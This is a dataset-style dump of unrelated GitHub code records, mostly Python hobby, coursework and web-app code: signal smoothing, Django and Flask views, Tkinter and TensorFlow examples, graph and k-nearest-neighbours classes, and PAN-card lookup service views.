to apply a specific moving average function to a pandas time series.\n\n Args:\n -----\n data >>> pandas Series. index datetime64[ns], values the data observed.\n\n Returns:\n --------\n pandas.Series with the results of the specifc method invoke.\n \"\"\"\n\n if self.method == \"simple\":\n return self.simple(data)\n elif self.method == \"exponential\":\n return self.exponential(data)\n else:\n raise Exception(\"Invalid method\")\n\n\nclass SavGol_smoothing():\n \"\"\" This class include a methods for the calculus of the Savitzky-Golay filter\n\n Args:\n -----\n polyorder (int) >>> Order of the polynomial used for the interpolation. Default is 1.\n window_size (int) >>> Time window size. Default is equal to 2.\n deriv (int) >>> Order of the derivate. If greater than 0, the method return the series of the derivates.\n Default is 0.\n \"\"\"\n\n def __init__(self, polyorder=1, window_size=2, deriv=0):\n\n if window_size <= 1:\n raise Exception('window_size too short')\n\n self.polyorder = polyorder\n self.window_size = window_size\n self.deriv = deriv\n\n def sav_gol(self, data):\n \"\"\" Computes Sav-Gol smoothing filter\n\n Args:\n -----\n data (pandas.Series) >>> independent variable\n\n Returns:\n --------\n pandas.Series\n \"\"\"\n\n from scipy.signal import savgol_filter\n\n return pd.Series(data=savgol_filter(data, polyorder=self.polyorder,\n window_length=self.window_size,\n deriv=self.deriv),\n index=data.index)\n\n def fit(self, data):\n \"\"\" Methods used to apply the Sav-Gol filter function to a pandas time series.\n\n Args:\n -----\n data >>> pandas Series. 
index datetime64[ns], values the data observed.\n\n Returns:\n --------\n pandas.Series with the results\n \"\"\"\n\n return self.sav_gol(data)\n","repo_name":"Tostox/mltools","sub_path":"mltools/timeSeriesTools/smoothingFilters.py","file_name":"smoothingFilters.py","file_ext":"py","file_size_in_byte":6953,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"26526451737","text":"from django.test import TestCase\n\nfrom gcloud.tests import mock\nfrom gcloud.tests.mock import MagicMock\nfrom gcloud.utils.components import PluginServiceApiClient\nfrom gcloud.utils.components import get_remote_plugin_name\n\nGET_PAAS_PLUGIN_INFO = \"gcloud.utils.components.PluginServiceApiClient.get_paas_plugin_info\"\nTEST_RESULT = {\n \"result\": True,\n \"results\": [{\"code\": \"code1\", \"name\": \"name1\"}, {\"code\": \"code2\", \"name\": \"name2\"}],\n \"count\": 2,\n}\nTEST_LIMIT = 100\nTEST_OFFSET = 0\n\n\nclass TestGetRemotePluginName(TestCase):\n def test_call_success(self):\n with mock.patch(\"gcloud.utils.components.env.USE_PLUGIN_SERVICE\", \"1\"):\n with mock.patch(GET_PAAS_PLUGIN_INFO, MagicMock(return_value=TEST_RESULT)):\n plugin_info = get_remote_plugin_name(limit=TEST_LIMIT, offset=TEST_OFFSET)\n PluginServiceApiClient.get_paas_plugin_info.assert_called_once_with(\n search_term=None, environment=\"prod\", limit=TEST_LIMIT, offset=TEST_OFFSET\n )\n self.assertEqual(plugin_info, {\"code1\": \"name1\", \"code2\": \"name2\"})\n","repo_name":"TencentBlueKing/bk-sops","sub_path":"gcloud/tests/utils/components/test_get_remote_plugin_name.py","file_name":"test_get_remote_plugin_name.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","stars":1001,"dataset":"github-code","pt":"53"} +{"seq_id":"6057609585","text":"# Classe para representar a tabela de candidatos\nclass Candidate:\n # Construtor da classe\n def __init__(self, id, CandidateName, MotherName, FatherName, Gender, CiviState, EducationLevel, Ethnicity, BirthDate,\n Nacionality, BirthCountry, BirthState, BirthCity, ShoeSize, PantsSize, ShirtSize, TelephoneNumber,\n SecondTelephoneNumber, Email, Cep, Country, State, City, Neighborhood, ResidencyType, Street, ResidencyNumber, Complement,\n RgNumber, RgEmissorCity, RgReleaseDate, Cpf, Pispasep, Function, Lodged,\n Pcd, RgFile, CpfFile, ResumeFile, CnhFile, ArmyFile, HasFriendFamiliar):\n self.id = id\n self.CandidateName = CandidateName\n self.MotherName = MotherName\n self.FatherName = FatherName\n self.Gender = Gender\n self.CiviState = CiviState\n self.EducationLevel = EducationLevel\n self.Ethnicity = Ethnicity\n self.BirthDate = BirthDate\n self.Nacionality = Nacionality\n self.BirthCountry = BirthCountry\n self.BirthState = BirthState\n self.BirthCity = BirthCity\n self.ShoeSize = ShoeSize\n self.PantsSize = PantsSize\n self.ShirtSize = ShirtSize\n self.TelephoneNumber = TelephoneNumber\n self.SecondTelephoneNumber = SecondTelephoneNumber\n self.Email = Email\n self.Cep = Cep\n self.Country = Country\n self.State = State\n self.City = City\n self.Neighborhood = Neighborhood\n self.ResidencyType = ResidencyType\n self.Street = Street\n self.ResidencyNumber = ResidencyNumber\n self.Complement = Complement\n self.RgNumber = RgNumber\n self.RgEmissorCity = RgEmissorCity\n self.RgReleaseDate = RgReleaseDate\n self.Cpf = Cpf\n self.Pispasep = Pispasep\n self.Function = Function\n self.Lodged = Lodged\n self.Pcd = Pcd\n self.RgFile = RgFile\n self.CpfFile = CpfFile\n self.ResumeFile = 
ResumeFile\n self.CnhFile = CnhFile\n self.ArmyFile = ArmyFile\n self.HasFriendFamiliar = HasFriendFamiliar\n \n # Retorna um dicionário com os dados da classe para facilitar a conversão para JSON\n def _dict_(self) -> dict:\n return {\n 'id': self.id,\n 'CandidateName': self.CandidateName,\n 'MotherName': self.MotherName,\n 'FatherName': self.FatherName,\n 'Gender': self.Gender,\n 'CiviState': self.CiviState,\n 'EducationLevel': self.EducationLevel,\n 'Ethnicity': self.Ethnicity,\n 'BirthDate': self.BirthDate,\n 'Nacionality': self.Nacionality,\n 'BirthCountry': self.BirthCountry,\n 'BirthState': self.BirthState,\n 'BirthCity': self.BirthCity,\n 'ShoeSize': self.ShoeSize,\n 'PantsSize': self.PantsSize,\n 'ShirtSize': self.ShirtSize,\n 'TelephoneNumber': self.TelephoneNumber,\n 'SecondTelephoneNumber': self.SecondTelephoneNumber,\n 'Email': self.Email,\n 'Cep': self.Cep,\n 'Country': self.Country,\n 'State': self.State,\n 'City': self.City,\n 'Neighborhood': self.Neighborhood,\n 'ResidencyType': self.ResidencyType,\n 'Street': self.Street,\n 'ResidencyNumber': self.ResidencyNumber,\n 'Complement': self.Complement,\n 'RgNumber': self.RgNumber,\n 'RgEmissorCity': self.RgEmissorCity,\n 'RgEmissorCity': self.RgEmissorCity,\n 'RgReleaseDate': self.RgReleaseDate,\n 'Cpf': self.Cpf,\n 'Pispasep': self.Pispasep,\n 'Function': self.Function,\n 'Lodged': self.Lodged,\n 'Pcd': self.Pcd,\n 'RgFile': self.RgFile,\n 'CpfFile': self.CpfFile,\n 'ResumeFile': self.ResumeFile,\n 'CnhFile': self.CnhFile,\n 'ArmyFile': self.ArmyFile,\n 'HasFriendFamiliar': self.HasFriendFamiliar\n }","repo_name":"GustavGomes/AlfaCoreDumped2023","sub_path":"model/candidatesModel.py","file_name":"candidatesModel.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25572456728","text":"import sys\r\n\r\ndef maxProfit(prices):\r\n profit = 0\r\n min_price = sys.maxsize # system상 가장 큰 값\r\n\r\n # 최댓값과 최솟값을 갱신\r\n for price in prices:\r\n min_price = min(min_price, price) # 원래 min_price와 price 중 작은 것\r\n profit = max(price - min_price, profit) # 원래 profit과 price에서 min_price중 큰 것\r\n\r\n return profit\r\n\r\nprint(maxProfit([7, 1, 5, 3, 6, 4]))","repo_name":"Park-Ji-Yoon/Algorithm","sub_path":"파이썬 알고리즘 인터뷰/chapter07/12_주식을 사고팔기 가장 좋은 시점_diff.py","file_name":"12_주식을 사고팔기 가장 좋은 시점_diff.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28497054279","text":"from tkinter import *\nfrom tkinter import ttk\n\n# PARTE GRAFICA\n\nroot = Tk()\nroot.title(\"Punteggi\")\nroot.geometry(\"+800+250\")\n\nfor i in range(1, 2):\n root.rowconfigure(i, weight=1)\nfor i in range(2):\n root.columnconfigure(i, weight=1)\n\n# PARTE DI ALGORITMO\n\n# Variabili\n\nplayersList = {}\n\nerrorMessage = StringVar()\nplayerVar = StringVar()\nscoreVar = StringVar()\nbestPlayers = [\"\"] * 3\nbestScores = [\"\"] * 3\nbestPlayersVar = StringVar(value=bestPlayers)\nbestScoresVar = StringVar(value=bestScores)\n\n\n# Inserimento dati\n\ndef submit(event):\n player = playerVar.get()\n score = scoreVar.get()\n\n playerClear = player.strip().replace(\" \", \"\")\n\n if playerClear.isalpha():\n try:\n playersList[player.strip()] = float(score)\n errorMessage.set(\"\")\n playerVar.set(\"\")\n scoreVar.set(\"\")\n\n bestPlayersList = sorted(playersList.items(), key=lambda item: item[1], reverse=True)\n\n # Creo le liste con i valori\n if len(bestPlayersList) <= 3:\n for 
index in range(len(bestPlayersList)):\n bestPlayers[index] = bestPlayersList[index][0]\n bestScores[index] = bestPlayersList[index][1]\n bestPlayersVar.set(bestPlayers)\n bestScoresVar.set(bestScores)\n else:\n for index in range(3):\n bestPlayers[index] = bestPlayersList[index][0]\n bestScores[index] = bestPlayersList[index][1]\n bestPlayersVar.set(bestPlayers)\n bestScoresVar.set(bestScores)\n\n\n except ValueError:\n errorMessage.set(\"Punteggio non valido\")\n\n elif player == \"\":\n errorMessage.set(\"Inserire i dati\")\n\n else:\n errorMessage.set(\"Nome non valido\")\n\n\n# PARTE GRAFICA\n\n# Primo frame\n\nbestPlayersNameFrame = ttk.Frame(root)\nbestPlayersNameFrame.grid(row=0, column=0, sticky=\"ne\", padx=10, pady=(20, 40))\n\nbestPlayersScoreFrame = ttk.Frame(root)\nbestPlayersScoreFrame.grid(row=0, column=1, sticky=\"nw\", padx=10, pady=(20, 40))\n\n# Frame nomi\n\nbestPlayersName = ttk.Label(bestPlayersNameFrame, text=\"Migliori giocatori:\")\nbestPlayersName.grid(row=0, column=0, sticky=\"nw\")\n\nbestPlayersNameList = Listbox(bestPlayersNameFrame, listvariable=bestPlayersVar, height=3)\nbestPlayersNameList.grid(row=1, column=0, sticky=\"nw\")\n\n# Frame punteggi\n\nbestPlayersName = ttk.Label(bestPlayersScoreFrame, text=\"Migliori punteggi:\")\nbestPlayersName.grid(row=0, column=0, sticky=\"nw\")\n\nbestPlayersScoreList = Listbox(bestPlayersScoreFrame, listvariable=bestScoresVar, height=3)\nbestPlayersScoreList.grid(row=1, column=0, sticky=\"nw\")\n\n# Secondo frame\n\ninputNameFrame = ttk.Frame(root)\ninputNameFrame.grid(row=1, column=0, sticky=\"se\", padx=10, pady=(0, 20))\n\ninputScoreFrame = ttk.Frame(root)\ninputScoreFrame.grid(row=1, column=1, sticky=\"sw\", padx=10, pady=(0, 20))\n\n# Frame input nomi\n\nbestPlayersName = ttk.Label(inputNameFrame, text=\"Inserisci giocatore:\")\nbestPlayersName.grid(row=0, column=0, sticky=\"nw\")\n\nbestPlayersNameList = Entry(inputNameFrame, textvariable=playerVar)\nbestPlayersNameList.grid(row=1, column=0, sticky=\"nw\")\n\n# Frame input punteggi\n\nbestPlayersName = ttk.Label(inputScoreFrame, text=\"Inserisci punteggio:\")\nbestPlayersName.grid(row=0, column=0, sticky=\"nw\")\n\nbestPlayersScoreList = Entry(inputScoreFrame, textvariable=scoreVar)\nbestPlayersScoreList.grid(row=1, column=0, sticky=\"nw\")\n\n# Terza riga\n\nerrorMessageLabel = ttk.Label(root, textvariable=errorMessage)\nerrorMessageLabel.grid(row=2, column=0, sticky=\"sw\", padx=10, pady=(0, 20))\n\nenterButton = ttk.Button(root, text=\"Insert\", command=lambda: submit(\"\"))\nenterButton.grid(row=2, column=1, sticky=\"se\", padx=10, pady=(0, 20))\n\nroot.bind(\"\", submit)\n\nroot.mainloop()\n","repo_name":"Samu-Amy/Poli-Info-Lab","sub_path":"Lab_3/Es5.py","file_name":"Es5.py","file_ext":"py","file_size_in_byte":3803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30961086209","text":"def get_scores(goals1, goals2):\n team1_scores = 3 if goals1 > goals2 else 0 if goals1 < goals2 else 1\n team2_scores = 3 if goals2 > goals1 else 0 if goals2 < goals1 else 1\n return team1_scores, team2_scores\n\n\ndef table(scores):\n was_game = 1\n win = 1 if scores == 3 else 0\n draw = 1 if scores == 1 else 0\n lose = 1 if scores == 0 else 0\n return [was_game, win, draw, lose, scores]\n\n\nplays: int = int(input())\npivot_table: dict = {}\nfor i in range(plays):\n team1, goals1, team2, goals2 = input().split(';')\n teams: tuple = (team1, team2)\n scores: tuple = get_scores(int(goals1), int(goals2))\n for j in 
range(len(teams)):\n team_table: list = table(scores[j])\n if teams[j] not in pivot_table:\n pivot_table[teams[j]] = team_table\n else:\n old_table: list = pivot_table[teams[j]]\n pivot_table[teams[j]] = list(map(lambda a, b: a + b, team_table, old_table))\n\nfor team, table in pivot_table.items():\n print(team + ':', *table)\n","repo_name":"uheif/Stepik-Python_base","sub_path":"Lesson_3-7-1/task_1/task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6326389116","text":"from odoo import models, fields, api, _\n\nclass SaleOrderInherit(models.Model):\n _inherit = 'sale.order'\n\n\n transfer_id= fields.Many2one('stock.picking', string='Add Transfer ID', help='When selected, the associated transfer lines are added to the Sale Order Line.')\n\n @api.onchange('transfer_id')\n def onchange_workorder_id(self):\n for rec in self:\n lines=[]\n for line in self.transfer_id.move_lines:\n vals = {\n 'product_id': line.product_id,\n 'name': line.product_id.name,\n 'product_uom_qty': line.product_uom_qty,\n 'product_uom': line.product_id.product_tmpl_id.uom_id,\n 'price_unit': line.product_id.product_tmpl_id.list_price\n # 'order_id': line.id\n # 'customer_lead': 0.0\n }\n lines.append((vals))\n rec.order_line = lines\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"darlamichhane/OdooModules","sub_path":"ab_global_autopoint/models/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16689027695","text":"import re\nstr1=input('Enter any string:')\nprint('You have entered \\''+str1+\"\\' String\")\ns1 = \"#Hello Abhilash Sharma is a good boy @viratkohli \"\ns2 = \"Abhi\"\n#print(len(s1))\n#for i in s1:\n# print(i)\n\nprint(s1[0])\ns2 = s1.find(s2)\nprint(s2)\n\nn = int(input())\nfor i in range(1,n+1):\n print(i,end=\"\")\n\ns3 = re.sub('[#@]', '', s1)\nprint(s3)","repo_name":"abhilash97sharma/python_codes","sub_path":"String_Operation.py","file_name":"String_Operation.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75255862568","text":"from flask_restful import Resource\nfrom flask import request, json\nfrom flask_jwt import jwt_required\n\nfrom repository.person_repository import PersonRepository\n\n\nclass PersonResource(Resource):\n\n repository = PersonRepository()\n\n @jwt_required()\n def post(self):\n data = request.get_json()\n person = self.repository.save(data['name'], data['email'])\n json_data = {\n 'id': person.id,\n 'name': person.name,\n 'email': person.email\n }\n return {'person': json_data}, 201\n\n @jwt_required()\n def get(self):\n persons = self.repository.find_all()\n persons_json = []\n\n for p in persons:\n person = {\n 'id': p.id,\n 'name': p.name,\n 'email': p.email\n }\n persons_json.append(person)\n\n return {'persons': persons_json}\n\n\nclass PersonFindResource(Resource):\n\n repository = PersonRepository()\n\n def get(self, id):\n person = self.repository.find_one(id)\n\n if person == None:\n return {'data': 'not found'}\n\n person_json = {\n 'id': person.id,\n 'name': person.name,\n 'email': person.email\n }\n return {'person': person_json}, 
200\n","repo_name":"DelanoDuarte/flask_react_app","sub_path":"server/resources/person_resource.py","file_name":"person_resource.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27552829350","text":"import tensorflow as tf\nimport numpy as np\nfrom tensorflow.examples.tutorials.mnist import input_data\nfrom tensorflow.contrib import layers\n\nDATA_DIR = '/tmp/data'\n# NUM_STEPS = 5000\n\n# def model_fn(x, target, mode, params):\ndef model_fn(features, labels, mode, params):\n y_ = tf.cast(labels, tf.float32)\n x_image = tf.reshape(x_data, [-1, 28, 28, 1])\n\n # Conv layer 1\n conv1 = layers.convolution2d(x_image, 32, [5,5], activation_fn=tf.nn.relu, biases_initializer=tf.constant_initializer(0.1), weights_initializer=tf.truncated_normal_initializer(stddev=0.1))\n pool1 = layers.max_pool2d(conv1, [2,2])\n\n # Conv layer 2\n conv2 = layers.convolution2d(pool1, 64, [5,5], activation_fn=tf.nn.relu, biases_initializer=tf.constant_initializer(0.1), weights_initializer=tf.truncated_normal_initializer(stddev=0.1))\n pool2 = layers.max_pool2d(conv2, [2,2])\n\n # FC layer\n pool2_flat = tf.reshape(pool2, [-1, 7*7*64])\n fc1 = layers.fully_connected(pool2_flat, 1024, activation_fn=tf.nn.relu, biases_initializer=tf.constant_initializer(0.1), weights_initializer=tf.truncated_normal_initializer(stddev=0.1))\n fc1_drop = layers.dropout(fc1, keep_prob=params[\"dropout\"], is_training=(mode == 'train'))\n \n # Readout layer\n y_conv = layers.fully_connected(fc1_drop, 10, activation_fn=None)\n \n predictions = tf.argmax(y_conv, 1)\n \n if mode == tf.estimator.ModeKeys.PREDICT:\n return tf.estimator.EstimatorSpec(mode=mode, predictions={\"x\": predictions})\n\n cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_conv, logits=y_))\n # train_op = layers.optimize_loss(loss=cross_entropy, global_step=tf.contrib.framework.get_global_step(), learning_rate=params[\"learning_rate\"], optimizer=\"Adam\")\n train_op = layers.optimize_loss(loss=cross_entropy, global_step=tf.train.get_global_step(), learning_rate=params[\"learning_rate\"], optimizer=\"Adam\")\n eval_metric_ops = {\"rmse\": tf.metrics.root_mean_squared_error(tf.cast(labels, tf.float64), predictions)}\n return tf.estimator.EstimatorSpec(mode=mode, loss=cross_entropy, train_op=train_op, eval_metric_ops=eval_metric_ops)\n\ndata = input_data.read_data_sets(DATA_DIR, one_hot=True)\nx_data, y_data = data.train.images, np.int32(data.train.labels)\ntf.cast(x_data, tf.float32)\ntf.cast(y_data, tf.float32)\n\nmodel_params = {\"learning_rate\": 1e-4, \"dropout\": 0.5}\n\n# CNN = tf.contrib.learn.Estimator(model_fn=model_fn, params=model_params)\n# function is deprecated\nCNN = tf.estimator.Estimator(model_fn=model_fn, params=model_params)\n\nprint(\"Starting training for %s steps max\" % 5000)\n# CNN.fit(x=data.train.images, y=data.train.labels, batch_size=50, max_steps=5000)\n# change fit() to train()\n\ninput_fn = tf.estimator.inputs.numpy_input_fn({\"x\":x_data}, y_data, batch_size=50, num_epochs=None, shuffle=True)\n\n# train_input_fn = tf.estimator.inputs.numpy_input_fn({\"x\":x_data}, y:y_data, batch_size=50, num_epochs=5000, shuffle=False)\n# eval_input_fn = tf.estimator.inputs.numpy_input_fn({\"x\":x_data}, y:y_data, batch_size=50, num_epochs=None, shuffle=True)\n\nCNN.train(input_fn=input_fn, steps=5000)\n\n\ntest_acc = 0\n\nfor ii in range(5):\n batch = data.test.next_batch(2000)\n predictions = list(CNN.predict(batch[0], 
as_iterable=True))\n    test_acc = test_acc + (np.argmax(batch[1],1) == predictions).mean()\n\nprint(test_acc / 5)\n","repo_name":"ITHelpDec/Tensorflow","sub_path":"Chapter 07/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":3356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38882509438","text":"import random\r\nfrom kNearestNeighbors import kNearestNeighbors\r\n\r\n\r\nclass CondensedKNearestNeighbors(kNearestNeighbors):\r\n    \"\"\"\r\n    This takes a set of training data and adds relevant samples one by one until no more are added.\r\n    It then creates a kNearestNeighbors object using just those samples.\r\n    \"\"\"\r\n\r\n    def __init__(self, train, k=1):\r\n        \"\"\"\r\n        @param train The full training set to be cut down\r\n        @param k=1 A k value, with the default set to 1\r\n        \"\"\"\r\n\r\n        samples = []  # sample Observations\r\n        randomSample = train.pop(random.randint(0, len(train) - 1))\r\n        samples.append(randomSample)  # Choose a random starting Observation\r\n\r\n        numberOfSamples = len(samples)\r\n        while True:  # continue until no more samples are added\r\n            for index in range(len(train) - 1, -1, -1):  # iterate backwards so pops do not shift indices still to be visited\r\n                observation = train[index]\r\n                minSampleDistance = 99999  # reset per observation; start high so any real distance improves it\r\n                closestSample = None  # there is no closest potential sample at the start\r\n                for sample in samples:\r\n                    sampleDistance = observation.calcDistance(sample)\r\n                    if sampleDistance < minSampleDistance:\r\n                        minSampleDistance = sampleDistance\r\n                        closestSample = sample\r\n                if closestSample.classifier == observation.classifier:  # do not consider for reduction, these are the same class and the closest sample will represent it\r\n                    continue\r\n                else:  # current observation is a different class from its closest sample, add this to the reduced dataset\r\n                    samples.append(train.pop(index))\r\n            if len(samples) == numberOfSamples:  # no new samples on this pass, exit the while loop\r\n                break\r\n            numberOfSamples = len(samples)  # update the number of samples to check against the next run\r\n        print(\"Number of samples selected: \" + str(len(samples)))\r\n\r\n        super().__init__(samples, k)  # initialize a kNearestNeighbors object with these samples as training set\r\n","repo_name":"dana-truempy/KNN-CNN","sub_path":"CondensedKNearestNeighbors.py","file_name":"CondensedKNearestNeighbors.py","file_ext":"py","file_size_in_byte":2116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21543802443","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\n\r\nThis is a temporary script file.\r\n\"\"\"\r\n\r\n#%% Import\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn import metrics, cross_validation\r\nfrom sklearn.cross_validation import train_test_split\r\nfrom sklearn.metrics import accuracy_score\r\n\r\n\r\n#%% Merge tables into dataframe\r\ndf = pd.read_csv('MUDAC/df.csv')\r\ndf_test = pd.read_csv('MUDAC/df_test.csv')\r\n\r\ndf1 = df.filter(['HCU', 'gender', 'POS11', 'POS21', 'POS24', 'POS81', 'AGECAT', 'CONF_CAT'], axis=1).copy()\r\ndf2 = pd.get_dummies(df1, columns = ['gender']).fillna(0)\r\ndf_test1 = df_test.filter(['HCU', 'gender', 'POS11', 'POS21', 'POS24', 'POS81', 'AGECAT', 'CONF_CAT'], axis=1).copy()\r\ndf_test2 = pd.get_dummies(df_test1, columns = ['gender']).fillna(0)\r\n\r\nX_train = df2.iloc[:,1:]\r\ny_train = df2.iloc[:,0]\r\nX_test = 
df_test2.iloc[:,1:]\r\n\r\n#%% Logistic Regression\r\nlogreg = LogisticRegression()\r\nlogreg.fit(X_train, y_train)\r\npred = logreg.predict(X_test)\r\ndf_test['pred'] = pred\r\noutput = df_test.loc[df_test['pred'] == 1]\r\noutput.to_csv('MUDAC/out.csv',sep=',')\r\n\r\npredicted = cross_validation.cross_val_predict(logreg, X_train, y_train, cv=10)\r\nprint (accuracy_score(y_train, predicted))\r\n#print (metrics.classification_report(y, predicted))\r\n\r\n#%% Random Forest\r\nrandom_forest = RandomForestClassifier(n_estimators=100)\r\nrandom_forest.fit(X_train, y_train)\r\npred = random_forest.predict(X_test)\r\ndf_test['pred'] = pred\r\noutput = df_test.loc[df_test['pred'] == 1]\r\n\r\npredicted = cross_validation.cross_val_predict(random_forest, X_train, y_train, cv=10)\r\nprint (accuracy_score(y_train, predicted))\r\n","repo_name":"EchoZhaoo/DS-Project-Portfolio","sub_path":"Python/MUDAC_python.py","file_name":"MUDAC_python.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69884889128","text":"########################################################\n#\n# Representation of a Graph for adjacency metrix\n#\n########################################################\nimport numpy as np\n\nfrom implementation.base_graph import Graph\n\n\nclass AdjacencyMatrixGraph(Graph):\n\n def __init__(self, numVertices, directed=False):\n super(AdjacencyMatrixGraph, self).__init__(numVertices, directed)\n self.matrix = np.zeros((numVertices, numVertices))\n\n def add_edge(self, v1, v2, weight=1):\n if v1 >= self.numVertices or v2 >= self.numVertices or v1 < 0 or v2 < 0:\n raise ValueError('Vertices %d and %d are out of bounds' % (v1, v2))\n\n if weight < 1:\n raise ValueError('An edge cannot have weight < 1')\n\n self.matrix[v1][v2] = weight\n\n if self.directed == False:\n self.matrix[v2][v1] = weight\n\n def get_adjacent_vertices(self, v):\n self.check_valid_vartices(v)\n\n adjacent_vertices = []\n for i in range(self.numVertices):\n if self.matrix[v][i] > 0:\n adjacent_vertices.append(i)\n\n return adjacent_vertices\n\n def get_indegree(self, v):\n self.check_valid_vartices(v)\n\n in_degree = 0\n for i in range(self.numVertices):\n if self.matrix[i][v] > 0:\n in_degree += 1\n\n return in_degree\n\n def get_edge_weight(self, v1, v2):\n return self.matrix[v1][v2]\n\n def display(self):\n for i in range(self.numVertices):\n for v in self.get_adjacent_vertices(i):\n print(i, ' -----> ', v)\n\n def check_valid_vartices(self, v):\n if v < 0 or v >= self.numVertices:\n raise ValueError('Cannot access vertices %d' % v)\n","repo_name":"e-liyai/Graphs_in_Python","sub_path":"implementation/adjacency_matrix_graph/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5431092492","text":"import numpy as np\nimport matplotlib.pyplot as plt\n \nx = np.arange(1,11)\ny1 = x**2\ny2 = x**3\ny3 = x**4\n\nplt.plot(y1, 'o', y2, '^', y3, 'bs')\nplt.legend(['y1', 'y2','y3'], loc = 'upper left')\nplt.title('Values', fontsize = 20)\nplt.xlabel('X', fontsize = 15)\nplt.ylabel('Y', fontsize = 15)\nplt.grid(linestyle = '--', alpha = 0.8, color = 
'red')\nplt.show()","repo_name":"Bosh-Kuo/Udemy-Bootcamp-of-Data-Science-with-Python","sub_path":"Section8_Matplotlib/Ex8_9.py","file_name":"Ex8_9.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73886282087","text":"def Alisa():\n koloda = []\n for i in range(1, 11):\n suit = ['worms', 'bubi', 'blame', 'cross']\n for j in range(4):\n card = str(i) + \" \" + suit[j]\n koloda.append(card)\n print(koloda)\n\nAlisa()","repo_name":"AlexAntipin/Cryptographic_Protocols","sub_path":"5 задание/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12882543131","text":"from django.shortcuts import render, HttpResponse\nfrom rest_framework.views import View\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom .forms import *\nfrom accounts.views import AccountView,TransactionsView\nfrom services.views import ServiceView\nfrom utils.common import low_balance_err\nfrom .models import Panfind, Panpdf, Allpanpdf\nfrom utils.services_api import aadhar_to_pan_api\nfrom django.db import transaction\nfrom admin_services.models import InstantPanTransactions\n\nclass InstantPanFindView(LoginRequiredMixin, View):\n def get(self, request):\n form = InstantPanFindForm()\n service = ServiceView().get_service_by_id('INSTANT_PAN_FIND')\n return render(request, 'services/pan/instant_pan_find.html', context={'title': 'Instant Find Pan', 'form': form, 'service': service})\n\n def post(self, request):\n form = InstantPanFindForm(request.POST) # form data from request\n ac = AccountView().get_account(request)\n form.instance.account = ac\n service = ServiceView().get_service_by_id('INSTANT_PAN_FIND')\n\n if ac is None:\n return HttpResponse('Account not found')\n elif service.charge > ac.balance:\n request.err = low_balance_err\n elif form.is_valid():\n with transaction.atomic():\n sp1 = transaction.savepoint()\n form.instance.tid=TransactionsView().add_record(request,service.charge)\n data=form.save()\n res=aadhar_to_pan_api(request,form.instance.aadhar_no,data.id)\n if res.get('pan_no'):\n data.pan_no=res['pan_no']\n data.save()\n AccountView().debit_money(request, service.charge)\n InstantPanTransactions.create_or_update_transaction()\n request.msg = \"Pan no. 
found check list!\"\n transaction.savepoint_commit(sp1)\n elif res.get('status') and res['status']==\"Fail to Login\":\n request.err = \"Wrong data submitted!\"\n transaction.savepoint_rollback(sp1)\n else:\n request.err = res['message']\n transaction.savepoint_rollback(sp1)\n else:\n request.err = \"Something went wrong!\"\n return self.get(request)\n\nclass NsdlPanFindView(LoginRequiredMixin, View):\n def get(self, request):\n form = PanFindForm()\n service = ServiceView().get_service_by_id('PAN_FIND')\n return render(request, 'services/pan/pan_find.html', context={'title': 'Find Pan', 'form': form, 'service': service})\n\n def post(self, request):\n form = PanFindForm(request.POST) # form data from request\n ac = AccountView().get_account(request)\n form.instance.account = ac\n service = ServiceView().get_service_by_id('PAN_FIND')\n\n if ac is None:\n return HttpResponse('Account not found')\n elif service.charge > ac.balance:\n request.err = low_balance_err\n elif form.is_valid():\n AccountView().debit_money(request, service.charge)\n form.instance.tid=TransactionsView().add_record(request,service.charge)\n form.save() # saving the data\n request.msg = \"Successfully submitted!\"\n else:\n request.err = \"Something went wrong!\"\n return self.get(request)\n \n\nclass AllpanpdfView(LoginRequiredMixin, View):\n def get(self, request):\n form = AllpanpdfForm()\n service = ServiceView().get_service_by_id('UTI_PAN_PDF')\n return render(request, 'services/pan/uti_pan_pdf.html', context={'title': 'UTI PAN PDF', 'form': form, 'service': service})\n\n def post(self, request):\n form = AllpanpdfForm(request.POST,request.FILES) # form data from request\n ac = AccountView().get_account(request)\n form.instance.account = ac\n service = ServiceView().get_service_by_id('UTI_PAN_PDF')\n\n if ac is 